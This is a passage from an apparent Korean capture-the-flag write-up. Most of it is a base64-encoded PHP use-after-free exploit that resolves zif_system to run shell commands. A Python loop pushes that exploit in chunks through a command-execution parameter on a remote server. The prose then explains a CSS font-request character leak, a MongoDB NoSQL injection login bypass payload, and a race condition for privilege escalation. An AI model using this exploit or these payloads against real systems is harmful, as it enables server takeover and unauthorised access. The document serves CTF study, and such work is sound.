RsZWFrKTsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBpZigkZGVyZWYgIT0gMHg3NDZlNjE3NDczNmU2ZjYzKQ0KICAgICAgICAgICAgICAgICAgICBjb250aW51ZTsNCiAgICAgICAgICAgIH0gZWxzZSBjb250aW51ZTsNCg0KICAgICAgICAgICAgJGxlYWsgPSBsZWFrKCRkYXRhX2FkZHIsICgkaSArIDQpICogOCk7DQogICAgICAgICAgICBpZigkbGVhayAtICRiYXNlID4gMCAmJiAkbGVhayAtICRiYXNlIDwgJGRhdGFfYWRkciAtICRiYXNlKSB7DQogICAgICAgICAgICAgICAgJGRlcmVmID0gbGVhaygkbGVhayk7DQogICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgaWYoJGRlcmVmICE9IDB4Nzg2NTY4MzI2ZTY5NjIpDQogICAgICAgICAgICAgICAgICAgIGNvbnRpbnVlOw0KICAgICAgICAgICAgfSBlbHNlIGNvbnRpbnVlOw0KDQogICAgICAgICAgICByZXR1cm4gJGRhdGFfYWRkciArICRpICogODsNCiAgICAgICAgfQ0KICAgIH0NCg0KICAgIGZ1bmN0aW9uIGdldF9iaW5hcnlfYmFzZSgkYmluYXJ5X2xlYWspIHsNCiAgICAgICAgJGJhc2UgPSAwOw0KICAgICAgICAkc3RhcnQgPSAkYmluYXJ5X2xlYWsgJiAweGZmZmZmZmZmZmZmZmYwMDA7DQogICAgICAgIGZvcigkaSA9IDA7ICRpIDwgMHgxMDAwOyAkaSsrKSB7DQogICAgICAgICAgICAkYWRkciA9ICRzdGFydCAtIDB4MTAwMCAqICRpOw0KICAgICAgICAgICAgJGxlYWsgPSBsZWFrKCRhZGRyLCAwLCA3KTsNCiAgICAgICAgICAgIGlmKCRsZWFrID09IDB4MTAxMDI0NjRjNDU3ZikgeyANCiAgICAgICAgICAgICAgICByZXR1cm4gJGFkZHI7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICB9DQoNCiAgICBmdW5jdGlvbiBnZXRfc3lzdGVtKCRiYXNpY19mdW5jcykgew0KICAgICAgICAkYWRkciA9ICRiYXNpY19mdW5jczsNCiAgICAgICAgZG8gew0KICAgICAgICAgICAgJGZfZW50cnkgPSBsZWFrKCRhZGRyKTsNCiAgICAgICAgICAgICRmX25hbWUgPSBsZWFrKCRmX2VudHJ5LCAwLCA2KTsNCg0KICAgICAgICAgICAgaWYoJGZfbmFtZSA9PSAweDZkNjU3NDczNzk3MykgeyANCiAgICAgICAgICAgICAgICByZXR1cm4gbGVhaygkYWRkciArIDgpOw0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgJGFkZHIgKz0gMHgyMDsNCiAgICAgICAgfSB3aGlsZSgkZl9lbnRyeSAhPSAwKTsNCiAgICAgICAgcmV0dXJuIGZhbHNlOw0KICAgIH0NCg0KICAgIGZ1bmN0aW9uIHRyaWdnZXJfdWFmKCRhcmcpIHsNCiAgICAgICAgDQogICAgICAgICRhcmcgPSBzdHJfc2h1ZmZsZShzdHJfcmVwZWF0KCdBJywgNzkpKTsNCiAgICAgICAgJHZ1bG4gPSBuZXcgVnVsbigpOw0KICAgICAgICAkdnVsbi0+YSA9ICRhcmc7DQogICAgfQ0KDQogICAgaWYoc3RyaXN0cihQSFBfT1MsICdXSU4nKSkgew0KICAgICAgICBkaWUoJ1RoaXMgUG9DIGlzIGZvciAqbml4IHN5c3RlbXMgb25seS4nKTsNCiAgICB9DQoNCiAgICAkbl9hbGxvYyA9IDEwOyANCiAgICAkY29udGlndW91cyA9IFtdOw0KICAgIGZvcigkaSA9IDA7ICRpIDwgJG5fYWxsb2M7ICRpKyspDQogICAgICAgICRjb250aWd1b3VzW10gPSBzdHJfc2h1ZmZsZShzdHJfcmVwZWF0KCdBJywgNzkpKTsNCg0KICAgIHRyaWdnZXJfdWFmKCd4Jyk7DQogICAgJGFiYyA9ICRiYWNrdHJhY2VbMV1bJ2FyZ3MnXVswXTsNCg0KICAgICRoZWxwZXIgPSBuZXcgSGVscGVyOw0KICAgICRoZWxwZXItPmIgPSBmdW5jdGlvbiAoJHgpIHsgfTsNCg0KICAgIGlmKHN0cmxlbigkYWJjKSA9PSA3OSB8fCBzdHJsZW4oJGFiYykgPT0gMCkgew0KICAgICAgICBkaWUoIlVBRiBmYWlsZWQiKTsNCiAgICB9DQoNCiAgICANCiAgICAkY2xvc3VyZV9oYW5kbGVycyA9IHN0cjJwdHIoJGFiYywgMCk7DQogICAgJHBocF9oZWFwID0gc3RyMnB0cigkYWJjLCAweDU4KTsNCiAgICAkYWJjX2FkZHIgPSAkcGhwX2hlYXAgLSAweGM4Ow0KDQogICAgDQogICAgd3JpdGUoJGFiYywgMHg2MCwgMik7DQogICAgd3JpdGUoJGFiYywgMHg3MCwgNik7DQoNCiAgICANCiAgICB3cml0ZSgkYWJjLCAweDEwLCAkYWJjX2FkZHIgKyAweDYwKTsNCiAgICB3cml0ZSgkYWJjLCAweDE4LCAweGEpOw0KDQogICAgJGNsb3N1cmVfb2JqID0gc3RyMnB0cigkYWJjLCAweDIwKTsNCg0KICAgICRiaW5hcnlfbGVhayA9IGxlYWsoJGNsb3N1cmVfaGFuZGxlcnMsIDgpOw0KICAgIGlmKCEoJGJhc2UgPSBnZXRfYmluYXJ5X2Jhc2UoJGJpbmFyeV9sZWFrKSkpIHsNCiAgICAgICAgZGllKCJDb3VsZG4ndCBkZXRlcm1pbmUgYmluYXJ5IGJhc2UgYWRkcmVzcyIpOw0KICAgIH0NCg0KICAgIGlmKCEoJGVsZiA9IHBhcnNlX2VsZigkYmFzZSkpKSB7DQogICAgICAgIGRpZSgiQ291bGRuJ3QgcGFyc2UgRUxGIGhlYWRlciIpOw0KICAgIH0NCg0KICAgIGlmKCEoJGJhc2ljX2Z1bmNzID0gZ2V0X2Jhc2ljX2Z1bmNzKCRiYXNlLCAkZWxmKSkpIHsNCiAgICAgICAgZGllKCJDb3VsZG4ndCBnZXQgYmFzaWNfZnVuY3Rpb25zIGFkZHJlc3MiKTsNCiAgICB9DQoNCiAgICBpZighKCR6aWZfc3lzdGVtID0gZ2V0X3N5c3RlbSgkYmFzaWNfZnVuY3MpKSkgew0KICAgICAgICBkaWUoIkNvdWxkbid0IGdldCB6aWZfc3lzdGVtIGFkZHJlc3MiKTsNCiAgICB9DQoNCiAgICANCiAgICAkZmFrZV9vYmpfb2Zmc2V0ID0gMHhkMDsNCiAgICBmb3IoJGkgPSAwOyAkaSA8IDB4MTEwOyAkaSArPSA4KSB7DQogICAgICAgIHdyaXRlKCRhYmMsICRmYWtlX29ial9vZmZzZXQgKyAkaSwgbGVhaygkY2xvc3VyZV9vYmosICRpKSk7DQogICAgfQ0KDQogICAgDQogICAgd3JpdGUoJGFiYywgMHgyMCwgJGFiY19hZGRyICsgJGZha2Vfb2JqX29mZnNldCk7DQogICAgd3JpdGUoJGFiYywgMHhkMCArIDB4MzgsIDEsIDQpOyANCiAgICB3cml0ZSgkYWJjLCAweGQwICsgMHg2OCwgJHppZl9zeXN0ZW0pOyANCg0KICAgICgkaGVscGVyLT5iKSgkY21kKTsNCiAgICBleGl0KCk7DQp9''')
u = 'http://3.38.109.135:28344/data/72ced1fa15db322c3c900cba8f15cf46/test.php?c=echo%20file_put_contents(%27/tmp/arang101%27,file_get_contents(%27/tmp/arang101%27)."{}");'
for i in range(0,len(ex),1000):
r = requests.get(u.format(ex[i:i+1000]))
time.sleep(1)
tracker-hidden이 display:none으로 되어있기 때문에 visible하게 바꾸어 font-family가 적용되도록 한 후, unicode-range를 이용하여 [A-Za-z0-9] 범위의 글자가 있을 시 해당 font-family를 통해 src:url()로 설정된 내 도메인으로 font 요청을 보내 어떤 글자가 존재하는지 알 수 있다.
서버단 코드 중 로그인 부분 코드를 보면 mongo db Model의 .findOne 메서드를 이용하여 사용자로부터 전달받은 id와 password를 key로 검색하는 것을 확인할 수 있다.
하지만 findOne 메서드를 이용하는점 + 서버의 구성이 app.use( bodyParser.urlencoded({ extended: true }) ); 로 이루어져 있기 때문에 사용자는 Object 객체를 직접 전달할 수 있다. 이로 인하여 nosql injection이 발생하게 되어
{"userid":"admin","password":{"$gt":""}} 와같이 요청하게 되면 admin의 패스워드를 모르더라도 로그인이 가능해진다.
nosql injection을 통해 admin의 토큰을 알아냈으니 local storage의 토큰값을 admin토큰으로 바꾸면 이와같이 admin으로 로그인된것을 확인할수있다.
하지만 해당 문제에서 진짜 어드민은 level=2 이상이 되어야한다.
현재 접속한 어드민은 level=1(member)로써 board list에서 조회할 수 있는 게시글은 자신의 레벨보다 낮은 레벨의 게시글만 조회할 수 있다. 따라서 문제의 목적에 따라 어드민 레벨을 획득하여야 한다.
이 상황에서 auth 동작이 다소 이상하게 되어있는데, 만약 올바른 division_number를 입력할 시 현재 접속한 계정의 level이 0일경우 해당 계정의 level를 1 올려주는 동작을 한다.
division_number는 알려져 있지 않지만 이또한 마찬가지로 nosql injection을 통해 레벨을 올릴 수 있다.
또한 해당 코드가 Division 모델에서 findOne 함수를 이용해 값을 찾고 updateOne을 이용해 update하는것으로 미루어보아 빠르게 해당 요청을 두번 전송하면 race condition이 발생하여 level이 두번 증가될 수 있을 가능성을 확인하였다.
